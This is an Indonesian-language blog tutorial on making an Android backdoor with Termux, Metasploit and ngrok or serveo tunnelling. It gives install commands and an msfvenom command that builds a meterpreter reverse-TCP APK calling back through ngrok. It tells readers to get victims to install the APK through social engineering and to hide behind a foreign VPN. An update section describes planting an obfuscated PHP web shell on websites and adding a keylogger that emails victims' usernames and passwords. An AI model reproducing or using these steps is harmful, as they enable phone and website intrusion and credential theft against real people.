Tutorial kali ini kita akan membahas tentang cara membuat backdoor menggunakan termux dan serveo port forwarding pengganti ngrok di termux Android.

Serveo adalah sebuah tool yang memberikan kita akses port forwarding.

Berbeda dengan ngrok yg membutuhkan sebuah binary file untuk menjalankannya.

Untuk menjalankan serveo sendiri kita bisa menggunakan perintah ssh karena metode forwading yg di gunakan oleh serveo ialah menggunakan metode tunneling ssh.

Oke, yang pertama kita buat backdoor terlebih dahulu.

Cara Membuat Backdoor

Pada artikel sebelumnya kita juga telah membahas tentang cara membuat backdoor menggunakan EasySploit.

Bahan yang akan kita gunakan disini adalah Hp Android, aplikasi termux, metasploit dan ngrok.

Pertama silahkan download dan install termux di Google Play Store.

Untuk langkah instalasi dan menggunakan termux silahkan baca cara install dan menggunakan termux di postingan sebelumnya.

Jika sudah di install, selanjutnya yaitu menginstal metasploit di termux untuk membuat backdoor.

Instal Metasploit

Berikut ini adalah perintah untuk menginstal tool metaspoit di termux:

$ pkg install upgrade

$ pkg install git

$ git clone https://github.com/Hax4us/Metasploit_termux

Cara Menggunakan Metasploit

Untuk menjalankan metasploit di termux kamu cukup masukan perintah-perintah di bawah ini:

$ ls

$ cd Metasploit_termux

$ chmod +x metasploit.sh

$ ./metasploit.sh

Setelah proses instalasi nya selesai, buka tab baru di termux (new session) dengan cara gulir sisi kiri ke kanan, lalu klik new session, ketik perintah:

$ cd

Konekan backdoor ke Ngrok

Selanjutnya ketik perintah dengan ketik:

$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip

$ unzip ngrok-stable-linux-arm.zip

Buka tab di browser kalian dan Buka Link > ngrok.com

Daftar dan buka dashboard ngrok silahkan copy command yang ada di no 3, seperti gambar berikut:

Copy dan paste kode yang kamu dapat dari akun ngrok kamu ke termux.

Selanjutnya jalankan perintah:

$ ./ngrok tcp 1337

Agar login terhubung, kita gunakan vpn, bebas apa saja vpn nya (saran anonytun/psipon pro) asal di set di luar indonesia. Jika terhubung maka tulisan akan berubah warna menjadi hijau.

Buka tab baru (new session) lagi gais di termux.

Jalankan perintah:

$ termux-setup-storage

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(port) R> /sdcard/backdor.apk

…”Catatan: LPORT= isi dengan port yang di samping 0.tcp.ngrok.io pada tab status ngrok + hilangkan tanda kurungnya”…

Lalu tunggu sampai proses selesai pembuatan aplikasinya (filenya biasanya berukuran 8kB) file berada di memori internal di luar tanpa folder (nama aplikasi = backdor.apk

Langkah selanjutnya yaitu menyebar aplikasinya ke calon korbannya, terserah dengan cara apa agar si korban mau menginstalnya, saran “gunakan teknik sosial engineering”.

Catatan: Kamu tidak boleh menutup termux sampai korban menginstal backdoor tersebut di hp nya. Jika kamu menutupnya maka kamu akan kehilangan akses.

Solusinya adalah mengganti port forwading ngrok ke serveo atau alternatif port forwading lainnya.

Berikut ini adalah cara menggunakan serveo:

Instal Serveo

Langkah pertama ialah menginstal openssh dengan perintah:

Jika menggunakan Termux:

$ pkg install openssh

Jika menggunakan Ubuntu/Debian/Linux Mint:

$ sudo apt-get install openssh

Jika menggunakan Arch Linux:

$ sudo pacman -S openssh

Masukan perintah berikut untuk menjalankan serveo masukan perintah:

$ ssh -R 80:localhost:8888 serveo.net

Keterangan:

• 80 adalah port forwarding nya
• 8888 adalah local portnya

Autput yang saya dapatkan:

Hi there Forwarding HTTP traffic from https://random.serveo.net Press g to start a GUI session and ctrl-c to quit.

Jika sudah seperti ini serveo siap digunakan.

Contoh link: https://random.serveo.net

Lanjut agar kamu bisa Back Conect ke serveo….

Agar bisa konek kembali ke serveo, kamu bisa menggunakan kostum sub domain di serveo denganengganti perintah:

$ ssh -R 80:localhost:80 serveo.net

Menjadi:

$ ssh -R indoxploit:localhost:80 serveo.net

Catatan: ganti “indoxploit” setelah argumen -R (terserah kalian mau di ganti apa) itu yang akan menjadi domain (host) kalian.

Contoh: https://indoxploit.serveo.net

Untuk local portnya sendiri bisa kalian sesuaikan sendiri sesuai selera tapi ingat harus 4 digit angka.

***…”UPDATE”…***

Cara Membuat Backdoor + Keylogger untuk Hack Username & Password

Untuk cara di atas mungkin sudah usang jadi saya buatkan cara membuat backdoor di android terbaru, untuk itu simak panduan berikut ini:

1. Membuat Sell Backdoor

Backdoor adalah script yang dapat mengeksekusi perintah sell, dengan wbsell kita tidak perlu lagi login melalui halaman login. Cukup dengan mengeksekusi sell backdoor tersebut, Anda telah mempunyai akses selayaknya admin website.

Untuk sell backdoornya cari yang gampang-gampang ajah, ngga usah membuat backdoot.

Kita bisa langsung download backdoornya di:

http://topshellv.com

Jika sudak kalian download sell backdoor tersebut, sekarang kita lanjut ke langkah selanjutnya:

2. Menyisipkan Sell Backdoor

Untuk menyembunyikan sell backdoornya disini kita akan menggunakan Obfuscator.

Obfuscator adalah sebuah tools untuk code. Tool ini dapat membuat code menjadi beberapa gabungan simbol.

Kelebihan tool ini yaitu bisa di gunakan secara online, jadi kamu ga perlu mendownloadnya.

Cukup kunjungi:

https://tools4nerds.com/online-tools/php-obfuscator

Selanjutya adalah menyiapkan keyloggernya.

Untuk keyloggernya silahkan Anda download keyloggernya DISINI.

Dengan script ini kalian bisa langsung mendapatkan email dan password dimana tempat backdoor berada.

Cara kerjanya adalah menggunakan metode send mail.

Anda akan mendapatkan notifikasi email yang berisi username dan password korban.

Itulah cara membuat backdoor, menyisipkan sell backdoor dan membuat keyloggernya.

Jika mengalami kesulitan, jangan sungkan untuk bertanya, selamat mencoba…